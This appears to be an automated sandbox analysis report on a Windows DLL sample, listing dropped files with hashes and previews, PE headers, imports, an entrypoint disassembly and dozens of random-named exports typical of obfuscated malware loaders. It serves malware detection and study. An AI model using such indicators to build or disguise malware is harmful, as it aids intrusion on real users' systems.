                        Encrypted:false
                        SSDEEP:48:cvIwSD8zspJgtWI9PfWSC8B5/8fm8M4J2yzZFz+q84WvRtKcQIcQwQud:uITf7QOSNTkJJXgRtKkwQud
                        MD5:26B590A331A6F8FD1749A5322B474168
                        SHA1:1DE890E6BD761F52BF77BCCF60C4ACCD5E57ECAD
                        SHA-256:6C3DACC0416F1B7F815490F2722B56017C93613967CE07E56371FF35329907B0
                        SHA-512:16685B796C45267A7871E7582681EA078EF278236970923E153CADA1A972AAF1B7D346D4752D3E4A8420A33E389520F5637FFBE45F8360D1F804F32F57CD60A3
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279796" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF6ED.tmp.dmp
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 08:45:40 2021, 0x1205a4 type
                        Category:dropped
                        Size (bytes):1060200
                        Entropy (8bit):1.459332588866509
                        Encrypted:false
                        SSDEEP:6144:gD0HYoO64LlrQxLx6OkjgUL+XOOk1PUG+7:gD0HYoO6q2G0
                        MD5:B6BCA9CF0542358C956D652400C7FF18
                        SHA1:5EFB1A9C3D6F8CA85FCE38945B9C352537BF5DCD
                        SHA-256:01112605F92FD92E2EB2C0507F67D12D15F3E6F48F1A7CD29EE469BBD91F1DD0
                        SHA-512:9D4EB1932918C38BB75AD67AD12CDF6120E0271BD019B90AF21454509F03264C13BB836C5188844EADE81CBCC3B6A9C4E4705853768568812E9AE00F10AC5CFA
                        Malicious:false
                        Preview: MDMP....... ..........a............4...............H.......$...........................`.......8...........T...........@...(!...........................................................................................U...........B......p.......GenuineIntelW...........T..............a*............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF1C.tmp.WERInternalMetadata.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8302
                        Entropy (8bit):3.690427159648357
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNi4DI666YF6SU1e6JgmfL8GSmSCpDI89b9isfJfm:RrlsNiD666Y4SU1lgmfLrSI9hfs
                        MD5:BF673072D4F11B6CB75E987CFAA38AD1
                        SHA1:AA483DC23D4CA3D73D92E79156DC7C5A28698ECC
                        SHA-256:FF96A29393157F771AD0D81CCB63C48CF89339901200BF7DAEA162D1B6DF87F2
                        SHA-512:9B8D70A980B50950540E453D8E6571058D7CB79301B9FD1D6AEC14005EB8D5D60624542745B3B728907078476FA3DA58CA9375D53F555CB92B960BFEB22EA3CE
                        Malicious:false
                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.0.4.<./.P.i.d.>.......
                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11021535299334234
                        Encrypted:false
                        SSDEEP:12:266TXm/Ey6q9995I+o4q3qQ10nMCldimE8eawHjcDP:26fl68G+ULyMCldzE9BHjcL
                        MD5:3D00C9DF8E5E1F47E6B20532AABBB4DA
                        SHA1:EE284E276B723832CF789E441C165C284CF3E6E9
                        SHA-256:25AD6701E1390B7B424DE6011D5ED110D51AEC075CBA958F70061D12CF1C823A
                        SHA-512:CE9ADC3D14389F35AA593B6C18C0A2455F3D46D888AEA3892389F4AA01E53F39345BD97A923342E0EC84915A539C23D23625CF379F22A5066939BACD3BC981A0
                        Malicious:false
                        Preview: .................................................................................................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.Py...... ......0v.X...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11275543432803492
                        Encrypted:false
                        SSDEEP:12:uTXm/Ey6q9995I+Y1miM3qQ10nMCldimE8eawHza1miI1/S/:bl68G+Y1tMLyMCldzE9BHza1tI8
                        MD5:DB838E4E82C37BA9F6B3A3D8ABEE5F63
                        SHA1:0C552D167ECA1FE99CEC5DB5D1363B0F60AA8EEC
                        SHA-256:D6E53CA12E78C95452BA62A335CA5F3F693D51D041D07600A505CF8F55CDCF73
                        SHA-512:0F92FE4D916A88AEDBB07948FC3CABF806A652F9DC3F3C6C57213D036EDBDE7FE56A61EF407C95FE0E28B56F02DC03CEFFC0AE01882F18EE4F27E79530EFA1F7
                        Malicious:false
                        Preview: .........................................................................................}.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.Py...... .......`.X...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.........t.......................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11262919192059402
                        Encrypted:false
                        SSDEEP:12:v7Xm/Ey6q9995I+Lh1mK2P3qQ10nMCldimE8eawHza1mKrf:6l68G+Lh1iPLyMCldzE9BHza1P
                        MD5:3E637E9236A071267C7F1E49DFC489FC
                        SHA1:2905C0C396334D9B37E2037309E0E5ED56AD7024
                        SHA-256:83523AB1EB55DB164B5CCB8EF4C9574BEE136A53397172C52D1F5BE8DB66CB21
                        SHA-512:79A74D7592AE36E3BF0F5DC314D6056A01A5F29238E3BD50945A879F8B35DC6B84963F1251BB3DC6A832D2AB7231CAA56BD601966F9DDAE74E38751113A258F7
                        Malicious:false
                        Preview: ........................................................................................0......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.Py...... .......Y.X...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P...............................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 (copy)
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11021535299334234
                        Encrypted:false
                        SSDEEP:12:266TXm/Ey6q9995I+o4q3qQ10nMCldimE8eawHjcDP:26fl68G+ULyMCldzE9BHjcL
                        MD5:3D00C9DF8E5E1F47E6B20532AABBB4DA
                        SHA1:EE284E276B723832CF789E441C165C284CF3E6E9
                        SHA-256:25AD6701E1390B7B424DE6011D5ED110D51AEC075CBA958F70061D12CF1C823A
                        SHA-512:CE9ADC3D14389F35AA593B6C18C0A2455F3D46D888AEA3892389F4AA01E53F39345BD97A923342E0EC84915A539C23D23625CF379F22A5066939BACD3BC981A0
                        Malicious:false
                        Preview: .................................................................................................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.Py...... ......0v.X...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11275543432803492
                        Encrypted:false
                        SSDEEP:12:uTXm/Ey6q9995I+Y1miM3qQ10nMCldimE8eawHza1miI1/S/:bl68G+Y1tMLyMCldzE9BHza1tI8
                        MD5:DB838E4E82C37BA9F6B3A3D8ABEE5F63
                        SHA1:0C552D167ECA1FE99CEC5DB5D1363B0F60AA8EEC
                        SHA-256:D6E53CA12E78C95452BA62A335CA5F3F693D51D041D07600A505CF8F55CDCF73
                        SHA-512:0F92FE4D916A88AEDBB07948FC3CABF806A652F9DC3F3C6C57213D036EDBDE7FE56A61EF407C95FE0E28B56F02DC03CEFFC0AE01882F18EE4F27E79530EFA1F7
                        Malicious:false
                        Preview: .........................................................................................}.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.Py...... .......`.X...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.........t.......................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001@Y (copy)
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11262919192059402
                        Encrypted:false
                        SSDEEP:12:v7Xm/Ey6q9995I+Lh1mK2P3qQ10nMCldimE8eawHza1mKrf:6l68G+Lh1iPLyMCldzE9BHza1P
                        MD5:3E637E9236A071267C7F1E49DFC489FC
                        SHA1:2905C0C396334D9B37E2037309E0E5ED56AD7024
                        SHA-256:83523AB1EB55DB164B5CCB8EF4C9574BEE136A53397172C52D1F5BE8DB66CB21
                        SHA-512:79A74D7592AE36E3BF0F5DC314D6056A01A5F29238E3BD50945A879F8B35DC6B84963F1251BB3DC6A832D2AB7231CAA56BD601966F9DDAE74E38751113A258F7
                        Malicious:false
                        Preview: ........................................................................................0......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.Py...... .......Y.X...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P...............................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):9062
                        Entropy (8bit):3.162514829896139
                        Encrypted:false
                        SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3z2+n:j+s+v+b+P+m+0+Q+q+N+n
                        MD5:45F724A01077F0B6AEE57CCEA1066184
                        SHA1:B48A7BF42762E10226AB294623D2096D16EE6D98
                        SHA-256:F6800E12FD9EEBFB859EECA2C2D1FBEF67B1B4A402D2984DACC1D78B870BE113
                        SHA-512:E149AED2BD14FAB717B9F6D83C9EC1BB50008CA22D4D7F42B8109C00E258A41D72C8FF85561F6B05AC0BF37CF8235F8D2CC54A9B65151CAF0E8C83E1CEC89FE6
                        Malicious:false
                        Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                        C:\Windows\appcompat\Programs\Amcache.hve
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1572864
                        Entropy (8bit):4.273017175011374
                        Encrypted:false
                        SSDEEP:12288:GB/9SE+9261nnSxOWwOwtbEPwcAsFR3GEabPLXU+WFrL+2cd1IjXv:M/9SE+9261nnSxFv
                        MD5:FCC37D9D122D15FE34FC4DDDD05F6038
                        SHA1:956B97E5CC071B8010E900AFEEDFCF8A95C3E634
                        SHA-256:5C694AD7B63140825A8C4F3BBDD126DCDFD23AAEC2DBE5851A29D1D9C97CFBCA
                        SHA-512:A299CBAC259AEF6AC5BE4BC809B512645A8F825E7D36AF1B127DE6BF07A84BB814AED15ECC90A4C859742B588BC36E1C8888FC892E0B01A2889F24A4FB775010
                        Malicious:false
                        Preview: regf[...[...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..O.X................................................................................................................................................................................................................................................................................................................................................ZK.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):16384
                        Entropy (8bit):3.3965968422991564
                        Encrypted:false
                        SSDEEP:192:XF8Y71DXqxajVY9V5FSEsWftx1xVxgoJ4XyVaJNSdkyFn6yvRrsfEWfYjdsiDoX5:1jG5Rftx1TPJ4X47FFn7bZd1DoXzCa
                        MD5:5C550C70E4ED4E7E716488E6848031D4
                        SHA1:52D5CC4A6437C4B59D07743F140150B884019537
                        SHA-256:A33739BC0572CD6C528F843972424444CDDF7FB75064ED17C12B07843B1A6C74
                        SHA-512:3DF58BE4EDADA3442BD0042A0408B894F83D689AEF2EC434E7A58E19277DAD8D269B70FC5A0CFBDB3A78B9A418CD2E6600E890B08F2D8B802CF1720D1B04CF47
                        Malicious:false
                        Preview: regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..O.X................................................................................................................................................................................................................................................................................................................................................ZK.HvLE.>......Z.............l3l.lRt6.Y. gh.........0..............hbin................p.\..,..........nk,..pQ.X................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..pQ.X....... ........................... .......Z.......................Root........lf......Root....nk ..pQ.X....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                        Static File Info

                        General

                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.0673433889863775
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:efELSMI5R4.dll
                        File size:372736
                        MD5:1ec5996508211a8d174a1a09d6289463
                        SHA1:ede146abf146c0dfdb88431dfecf5cc80b267335
                        SHA256:2933137a5e251f44b2e6d2cc919c8a679651a76b900b3b9e2b06edc73b64e5e6
                        SHA512:796194f3fa1b90a732fd2e567f6b3acd2443282e5c3c1d69db3f619b2285f5526e2059ac5ecfb47467cdec1539e3a0d936d83679677e67b87ee7573406f720bd
                        SSDEEP:6144:qRsMh9YQWtcgA70wgF7nJye6CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFLTRQKqV4epRmxAvAD
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...Q...Q...Q..E#...Q..E#...Q..E#...Q../$...Q...$...Q...$...Q...$...Q..E#...Q...Q...Q...Q...Q../$...Q../$...Q..Rich.Q.........

                        File Icon

                        Icon Hash:74f0e4ecccdce0e4

                        Static PE Info

                        General

                        Entrypoint:0x1001a401
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x10000000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x61A7100E [Wed Dec 1 06:02:54 2021 UTC]
                        TLS Callbacks:0x1000c500
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:609402ef170a35cc0e660d7d95ac10ce

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        cmp dword ptr [ebp+0Ch], 01h
                        jne 00007FD9248E77F7h
                        call 00007FD9248E7B88h
                        push dword ptr [ebp+10h]
                        push dword ptr [ebp+0Ch]
                        push dword ptr [ebp+08h]
                        call 00007FD9248E76A3h
                        add esp, 0Ch
                        pop ebp
                        retn 000Ch
                        push ebp
                        mov ebp, esp
                        push dword ptr [ebp+08h]
                        call 00007FD9248E809Eh
                        pop ecx
                        pop ebp
                        ret
                        push ebp
                        mov ebp, esp
                        jmp 00007FD9248E77FFh
                        push dword ptr [ebp+08h]
                        call 00007FD9248EBB84h
                        pop ecx
                        test eax, eax
                        je 00007FD9248E7801h
                        push dword ptr [ebp+08h]
                        call 00007FD9248EBC00h
                        pop ecx
                        test eax, eax
                        je 00007FD9248E77D8h
                        pop ebp
                        ret
                        cmp dword ptr [ebp+08h], FFFFFFFFh
                        je 00007FD9248E8163h
                        jmp 00007FD9248E8140h
                        push ebp
                        mov ebp, esp
                        push 00000000h
                        call dword ptr [1002808Ch]
                        push dword ptr [ebp+08h]
                        call dword ptr [10028088h]
                        push C0000409h
                        call dword ptr [10028040h]
                        push eax
                        call dword ptr [10028090h]
                        pop ebp
                        ret
                        push ebp
                        mov ebp, esp
                        sub esp, 00000324h
                        push 00000017h
                        call dword ptr [10028094h]
                        test eax, eax
                        je 00007FD9248E77F7h
                        push 00000002h
                        pop ecx
                        int 29h
                        mov dword ptr [1005AF18h], eax
                        mov dword ptr [1005AF14h], ecx
                        mov dword ptr [1005AF10h], edx
                        mov dword ptr [1005AF0Ch], ebx
                        mov dword ptr [1005AF08h], esi
                        mov dword ptr [1005AF04h], edi
                        mov word ptr [eax], es

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x583900x8ac.rdata
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x58c3c0x3c.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x5d0000x1bb0.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x56fdc0x54.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x571000x18.rdata
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x570300x40.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x280000x154.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x264f40x26600False0.546620521173data6.29652715831IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata0x280000x313fa0x31400False0.822468868972data7.4322686519IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x5a0000x18440xe00False0.270647321429data2.60881097454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .pdata0x5c0000x66c0x800False0.3583984375data2.21689595795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .reloc0x5d0000x1bb00x1c00False0.784598214286data6.62358237634IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Imports

                        DLLImport
                        KERNEL32.dllHeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer
                        USER32.dllGetDC, ReleaseDC, GetWindowRect

                        Exports

                        NameOrdinalAddress
                        Control_RunDLL10x100010a0
                        ajkaibu20x100016c0
                        akyncbgollmj30x10001480
                        alrcidxljxybdggs40x10001860
                        bgmotrriehds50x10001820
                        bojkfvynhhupnooyb60x100019f0
                        bujuoqldqlzaod70x10001800
                        bunsahctogxzts80x100019e0
                        cjogbtafwukesw90x10001830
                        csbbcaopuok100x100016a0
                        cyqrjpaeorjur110x100015f0
                        dlrzuyaeqj120x10001840
                        egiimrq130x10001850
                        evhgyts140x100014f0
                        fdqpjjjyuw150x100017e0
                        finabzjyxhxnnuuv160x10001510
                        fkeacqpbbfw170x10001910
                        fuwsgzf180x10001790
                        fzbmpailk190x10001980
                        gamsrhauvgl200x10001810
                        gjfqgtgk210x10001a10
                        gwsmfxfmekkyr220x100018b0
                        haymuvtatadeydqmk230x10001530
                        hqruohhkvpdalhq240x10001620
                        htdaydfvtjlujwcaj250x10001660
                        hzyrvjtx260x100017c0
                        ifnsupqhxkwj270x10001870
                        ijhgowlpmypocg280x10001720
                        ispjhrqaxnyflnn290x100015a0
                        iszvcqv300x100017a0
                        ixgucop310x100018d0
                        jcdvrhrguqtjpkc320x100016b0
                        jkfyadsdpoks330x100019c0
                        kfzgxmljkwaqy340x10001730
                        kzfvroxozxufciczm350x10001740
                        lpstjqa360x10001900
                        ltkoyvzovzkqemyw370x10001630
                        mdigcwjymnzvgaql380x100014d0
                        mefathlzguuhqodfx390x10001950
                        mgsrmfbja400x10001500
                        mrxhcceopg410x100014a0
                        nafhmuoq420x100018f0
                        nefxgpc430x100018a0
                        nrehxpiznrppeu440x10001690
                        nucocnvjyqp450x100018e0
                        obxoxtcbntaxofr460x10001890
